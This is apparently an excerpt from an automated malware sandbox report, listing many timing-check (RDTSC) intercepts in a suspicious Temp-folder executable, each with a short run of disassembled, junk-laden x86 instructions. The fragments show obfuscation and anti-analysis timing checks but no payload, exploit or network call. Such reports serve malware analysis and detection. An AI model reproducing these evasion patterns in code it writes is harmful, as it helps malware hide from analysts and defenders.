Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0CE8 second address: 4CA0CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0CEE second address: 4CA0CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0CF4 second address: 4CA0CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0CF8 second address: 4CA0D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov al, D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FF698E1E1B9h 0x00000014 and cx, 8926h 0x00000019 jmp 00007FF698E1E1B1h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0D37 second address: 4CA0D46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov dx, BCDCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0D46 second address: 4CA0DA1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF698E1E1B5h 0x00000008 or ax, A936h 0x0000000d jmp 00007FF698E1E1B1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF698E1E1B0h 0x0000001b and si, 5058h 0x00000020 jmp 00007FF698E1E1ABh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0DA1 second address: 4CA0DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0DA5 second address: 4CA0DAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0DAB second address: 4CA0DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 pushfd 0x00000006 jmp 00007FF698BF10D4h 0x0000000b or cl, FFFFFFE8h 0x0000000e jmp 00007FF698BF10CBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007FF698BF10D6h 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0DF6 second address: 4CA0DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0DFA second address: 4CA0DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0DFE second address: 4CA0E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0E04 second address: 4CA0E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0E0A second address: 4CA0E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0E0E second address: 4CA0E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0E12 second address: 4CA0EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FF698E1E1B3h 0x0000000f mov ch, 09h 0x00000011 pop edx 0x00000012 call 00007FF698E1E1B2h 0x00000017 pushfd 0x00000018 jmp 00007FF698E1E1B2h 0x0000001d jmp 00007FF698E1E1B5h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 pushad 0x00000027 mov dl, 9Fh 0x00000029 call 00007FF698E1E1B6h 0x0000002e mov si, CE61h 0x00000032 pop esi 0x00000033 popad 0x00000034 mov eax, dword ptr [774365FCh] 0x00000039 pushad 0x0000003a call 00007FF698E1E1B3h 0x0000003f movzx eax, di 0x00000042 pop ebx 0x00000043 push esi 0x00000044 mov dh, 16h 0x00000046 pop eax 0x00000047 popad 0x00000048 test eax, eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FF698E1E1B4h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0EC9 second address: 4CA0F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FF70B303B59h 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 mov cl, FBh 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF698BF10CFh 0x00000020 sbb eax, 1F24F77Eh 0x00000026 jmp 00007FF698BF10D9h 0x0000002b popfd 0x0000002c mov esi, 62DC6DC7h 0x00000031 popad 0x00000032 xor eax, dword ptr [ebp+08h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0F22 second address: 4CA0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0F26 second address: 4CA0F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0F2C second address: 4CA0F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0F32 second address: 4CA0FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f mov al, 4Bh 0x00000011 mov si, di 0x00000014 popad 0x00000015 ror eax, cl 0x00000017 jmp 00007FF698BF10CBh 0x0000001c leave 0x0000001d jmp 00007FF698BF10D6h 0x00000022 retn 0004h 0x00000025 nop 0x00000026 mov esi, eax 0x00000028 lea eax, dword ptr [ebp-08h] 0x0000002b xor esi, dword ptr [00452014h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 lea eax, dword ptr [ebp-10h] 0x00000037 push eax 0x00000038 call 00007FF69D482078h 0x0000003d push FFFFFFFEh 0x0000003f jmp 00007FF698BF10D0h 0x00000044 pop eax 0x00000045 pushad 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 pushfd 0x0000004a jmp 00007FF698BF10CAh 0x0000004f adc cl, FFFFFFC8h 0x00000052 jmp 00007FF698BF10CBh 0x00000057 popfd 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60008 second address: 4C6000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C6000C second address: 4C60012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60012 second address: 4C60068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5F3Ch 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e mov ecx, 2CE79E79h 0x00000013 pushfd 0x00000014 jmp 00007FF698E1E1B6h 0x00000019 and cx, 6588h 0x0000001e jmp 00007FF698E1E1ABh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF698E1E1B5h 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60068 second address: 4C600A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF698BF10D7h 0x00000009 xor ecx, 1718272Eh 0x0000000f jmp 00007FF698BF10D9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C600A5 second address: 4C600C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c mov bh, al 0x0000000e popad 0x0000000f and esp, FFFFFFF8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF698E1E1ACh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C600C5 second address: 4C60125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FF698BF10D6h 0x0000000f push eax 0x00000010 jmp 00007FF698BF10CBh 0x00000015 xchg eax, ecx 0x00000016 jmp 00007FF698BF10D6h 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FF698BF10D0h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60125 second address: 4C6012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 9699h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C6012E second address: 4C60145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60145 second address: 4C60194 instructions: 0x00000000 rdtsc 0x00000002 call 00007FF698E1E1B1h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007FF698E1E1B1h 0x00000010 jmp 00007FF698E1E1ABh 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF698E1E1B5h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60194 second address: 4C60233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov cl, dl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF698BF10D2h 0x00000011 push eax 0x00000012 pushad 0x00000013 push edi 0x00000014 push esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushfd 0x00000018 jmp 00007FF698BF10D9h 0x0000001d or cl, 00000066h 0x00000020 jmp 00007FF698BF10D1h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FF698BF10D3h 0x00000030 pop eax 0x00000031 pushfd 0x00000032 jmp 00007FF698BF10D9h 0x00000037 or esi, 3540F526h 0x0000003d jmp 00007FF698BF10D1h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60233 second address: 4C6026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007FF698E1E1ACh 0x00000012 mov eax, 48FF96D1h 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, 27ECA53Ch 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C6026A second address: 4C602EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, 38B3h 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 jmp 00007FF698BF10D6h 0x00000016 test esi, esi 0x00000018 jmp 00007FF698BF10D0h 0x0000001d je 00007FF70B33F42Fh 0x00000023 pushad 0x00000024 push esi 0x00000025 pushfd 0x00000026 jmp 00007FF698BF10CDh 0x0000002b jmp 00007FF698BF10CBh 0x00000030 popfd 0x00000031 pop esi 0x00000032 call 00007FF698BF10D9h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C602EA second address: 4C60334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000d jmp 00007FF698E1E1ADh 0x00000012 je 00007FF70B56C4CDh 0x00000018 jmp 00007FF698E1E1AEh 0x0000001d mov edx, dword ptr [esi+44h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF698E1E1B7h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60334 second address: 4C6033A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C6033A second address: 4C6036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FF698E1E1B6h 0x00000013 test edx, 61000000h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C6036D second address: 4C6041B instructions: 0x00000000 rdtsc 0x00000002 mov ax, 684Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FF698BF10D4h 0x0000000e jmp 00007FF698BF10D5h 0x00000013 popfd 0x00000014 popad 0x00000015 jne 00007FF70B33F3ADh 0x0000001b pushad 0x0000001c push esi 0x0000001d call 00007FF698BF10D3h 0x00000022 pop esi 0x00000023 pop edi 0x00000024 jmp 00007FF698BF10D6h 0x00000029 popad 0x0000002a test byte ptr [esi+48h], 00000001h 0x0000002e jmp 00007FF698BF10D0h 0x00000033 jne 00007FF70B33F37Eh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FF698BF10CDh 0x00000042 or esi, 1294E456h 0x00000048 jmp 00007FF698BF10D1h 0x0000004d popfd 0x0000004e push ecx 0x0000004f pop ebx 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C508C7 second address: 4C508D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C508D6 second address: 4C5091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF698BF10D3h 0x00000014 sbb cx, 00FEh 0x00000019 jmp 00007FF698BF10D9h 0x0000001e popfd 0x0000001f mov di, si 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C5091B second address: 4C50921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50921 second address: 4C50925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50925 second address: 4C50962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF698E1E1ACh 0x00000013 pushfd 0x00000014 jmp 00007FF698E1E1B2h 0x00000019 sbb cl, 00000058h 0x0000001c jmp 00007FF698E1E1ABh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50962 second address: 4C5097A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C5097A second address: 4C50998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ecx, 1B11010Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 movzx esi, bx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50998 second address: 4C50A00 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f jmp 00007FF698BF10D7h 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 jmp 00007FF698BF10D6h 0x0000001b push eax 0x0000001c jmp 00007FF698BF10CBh 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FF698BF10D6h 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50A00 second address: 4C50A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50A06 second address: 4C50A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50A0C second address: 4C50A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF698E1E1ABh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FF698E1E1B6h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF698E1E1B7h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50A5F second address: 4C50AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FF698BF10D0h 0x0000000c add ch, 00000058h 0x0000000f jmp 00007FF698BF10CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 sub ebx, ebx 0x0000001a jmp 00007FF698BF10CFh 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF698BF10D5h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50AB2 second address: 4C50AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF70B573A6Dh 0x0000000f jmp 00007FF698E1E1AEh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF698E1E1AAh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50AF0 second address: 4C50AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50AFF second address: 4C50B38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007FF698E1E1AEh 0x00000010 je 00007FF70B573A1Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50B38 second address: 4C50B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50B3C second address: 4C50B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50B42 second address: 4C50B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [77436968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF698BF10D5h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50B6D second address: 4C50B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50B73 second address: 4C50BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF70B3468F9h 0x0000000f pushad 0x00000010 mov di, cx 0x00000013 push eax 0x00000014 mov eax, edx 0x00000016 pop ebx 0x00000017 popad 0x00000018 mov edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FF698BF10D0h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50BAC second address: 4C50C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FF698E1E1AFh 0x00000010 jmp 00007FF698E1E1B8h 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF698E1E1AEh 0x0000001e adc cx, 5518h 0x00000023 jmp 00007FF698E1E1ABh 0x00000028 popfd 0x00000029 push esi 0x0000002a pushfd 0x0000002b jmp 00007FF698E1E1AFh 0x00000030 or al, FFFFFFDEh 0x00000033 jmp 00007FF698E1E1B9h 0x00000038 popfd 0x00000039 pop ecx 0x0000003a popad 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF698E1E1B3h 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50C51 second address: 4C50C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF698BF10CFh 0x00000008 pop esi 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov esi, edx 0x00000017 mov esi, ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50CFE second address: 4C50D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50D04 second address: 4C50D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
